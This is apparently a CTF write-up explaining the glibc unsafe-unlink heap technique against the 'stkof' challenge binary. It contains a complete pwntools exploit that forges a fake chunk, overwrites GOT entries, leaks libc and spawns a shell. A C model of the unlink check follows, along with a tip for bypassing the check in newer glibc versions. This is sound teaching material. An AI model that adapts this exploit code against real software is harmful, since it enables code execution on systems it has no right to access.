If the heap pointers are kept in .bss and you have even a small overflow or can tamper with a chunk header,

make active use of unsafe unlink.

The idea: put a fake free chunk inside your own chunk's user data with fd = slot - 0x18 and bk = slot - 0x10, where slot is the .bss entry holding your chunk's pointer. Then fd->bk and bk->fd both resolve to that slot, so the unlink sanity check passes. Overflow into the next chunk's header (prev_size = distance back to the fake chunk, PREV_INUSE cleared) and free it: backward consolidation unlinks the fake chunk and leaves slot = slot - 0x18. Every later write through that slot now rewrites the pointer table itself, which is an arbitrary write.


```python
# Python 2 / pwntools exploit for stkof (unsafe unlink). The paths are the
# author's local copies and the libc offset is specific to that libc build.
from pwn import *

p = process('/hee/hee/stkof')
lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
bin = ELF('/hee/hee/stkof')
raw_input()                    # pause here to attach a debugger

def mal(size):                 # option 1: malloc(size), pointer stored in the .bss table
    p.sendline('1')
    p.sendline(str(size))
    print "mal", p.recvuntil('OK')

def fre(ind):                  # option 3: free(table[ind])
    p.sendline('3')
    p.sendline(str(ind))
    print "free", p.recvuntil('OK')

def mod(ind, content):         # option 2: fgets(table[ind], len) with no bounds check
    p.sendline('2')
    p.sendline(str(ind))
    p.sendline(str(len(content) + 1))   # fgets reads len-1 bytes
    p.sendline(content)
    print "mod", p.recvuntil('OK')

bss = 0x602140                 # pointer table; table[i] lives at bss + 8*i
mal(0x80)                      # 1
mal(0x80)                      # 2: the fake chunk goes in its user data
mal(0x80)                      # 3: freeing it triggers the unlink
mal(0x80)                      # 4

# Fake chunk at table[2] (0x602150): fd->bk and bk->fd both resolve to
# table[2], so the fd/bk sanity check passes.
s  = ''
s += p64(0) * 2                # fake prev_size / size
s += p64(0x602150 - 0x18)      # fd
s += p64(0x602150 - 0x10)      # bk
s += 'A' * 0x60                # rest of chunk 2's user data
s += p64(0x80)                 # chunk 3 prev_size: points back at the fake chunk
s += p64(0x90)                 # chunk 3 size with PREV_INUSE cleared
mod(2, s)
fre(3)                         # backward consolidation -> unlink(fake) -> table[2] = 0x602138

# Writing through table[2] now rewrites the table itself.
s  = 'A' * 0x10                # 0x602138 and table[0]
s += p64(bin.got['strlen'])    # table[1]
s += p64(0x602158)             # table[2]
s += p64(bin.got['fgets'])     # table[3]
s += p64(0x602168)             # table[4] -> the "/bin/sh" right after it
s += '/bin/sh\x00'             # sits in the table[5] slot, used as data
mod(2, s)

mod(1, p64(bin.plt['printf'])) # strlen@got = printf@plt
p.sendline('4')                # option 4 calls strlen(table[3]) -> printf(fgets@got)
p.sendline('3')
p.recv(1)
leak = u64(p.recv(6).ljust(8, '\x00'))
system = leak - 163504         # fgets - system for the author's libc (lib.symbols gives it for another build)
print hex(leak)
print hex(system)

mod(1, p64(system))            # strlen@got = system
p.sendline('4')                # strlen(table[4]) -> system("/bin/sh")
p.sendline('4')
p.interactive()
```
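To show what the fake fd/bk pair actually does to the .bss table, here is a small model of the unlink step in C. This is an added example, not the writeup's code and not glibc: `unlink_chunk` reimplements only the fd->bk / bk->fd check that older (2.23-era) glibc performs, `table` and `fake_got_strlen` are stand-ins for stkof's pointer array and for strlen@got, and the slot index 4 is chosen so that slot - 0x18 stays inside the array. The arithmetic is the script's: fd = slot - 0x18, bk = slot - 0x10, and after the unlink the slot points 0x18 bytes below itself.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 64-bit glibc chunk header: fd at offset 0x10, bk at offset 0x18. */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* Stand-in for stkof's pointer table in .bss (assumption: 8 slots, like the
 * 0x602140 array in the script; slot i sits at table + 8*i). */
static struct chunk *table[8];

/* Stand-in for the GOT entry the exploit retargets (strlen@got in stkof). */
static uintptr_t fake_got_strlen = 0x4242424242424242ULL;

/* The forged chunk; in the real exploit it is chunk 2's user data. */
static struct chunk fake;

/* unlink() as older glibc (2.23 era) performs it: only the fd->bk / bk->fd
 * check. Returns 0 on success, -1 where malloc would abort. */
static int unlink_chunk(struct chunk *p)
{
    struct chunk *fd = p->fd;
    struct chunk *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;                      /* "corrupted double-linked list" */
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Forge fd = slot-0x18 and bk = slot-0x10 around table[idx] (the script's
 * 0x602150-0x18 / 0x602150-0x10 pair) and unlink. fd->bk and bk->fd are both
 * the slot itself, so the check passes only while table[idx] == &fake; with
 * point_table_at_fake == 0 the same forgery is rejected. */
static int forge_and_unlink(int idx, int point_table_at_fake)
{
    char *slot = (char *)&table[idx];
    memset(&fake, 0, sizeof fake);
    table[idx] = point_table_at_fake ? &fake : NULL;
    fake.fd = (struct chunk *)(slot - offsetof(struct chunk, bk));  /* slot - 0x18 */
    fake.bk = (struct chunk *)(slot - offsetof(struct chunk, fd));  /* slot - 0x10 */
    return unlink_chunk(&fake);
}

/* After the unlink, table[idx] == &table[idx-3] (slot - 0x18). A "fill" on
 * idx then rewrites the table, and a "fill" on the rewritten slot is an
 * arbitrary write, here into the stand-in GOT entry. Returns the GOT value. */
static uintptr_t hijack_got(int idx, uintptr_t new_value)
{
    if (forge_and_unlink(idx, 1) != 0)
        return 0;
    struct chunk *target = (struct chunk *)&fake_got_strlen;
    memcpy(table[idx], &target, sizeof target);           /* table[idx-3] = &got */
    memcpy(table[idx - 3], &new_value, sizeof new_value); /* *got = new_value   */
    return fake_got_strlen;
}

int main(void)
{
    printf("unlink with slot pointing at fake: %d\n", forge_and_unlink(4, 1));
    printf("table[4] == &table[1]: %d\n", table[4] == &table[1]);
    printf("unlink without that pointer: %d\n", forge_and_unlink(4, 0));
    printf("GOT after hijack: 0x%llx\n",
           (unsigned long long)hijack_got(4, 0x4141414141414141ULL));
    return 0;
}
```

One caveat for newer targets: from glibc 2.26 on, unlink also checks that the fake chunk's size equals the next chunk's prev_size, so the script's fake size field of 0 would abort there; setting it to 0x80 (matching the prev_size written into chunk 3) keeps the same primitive working.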

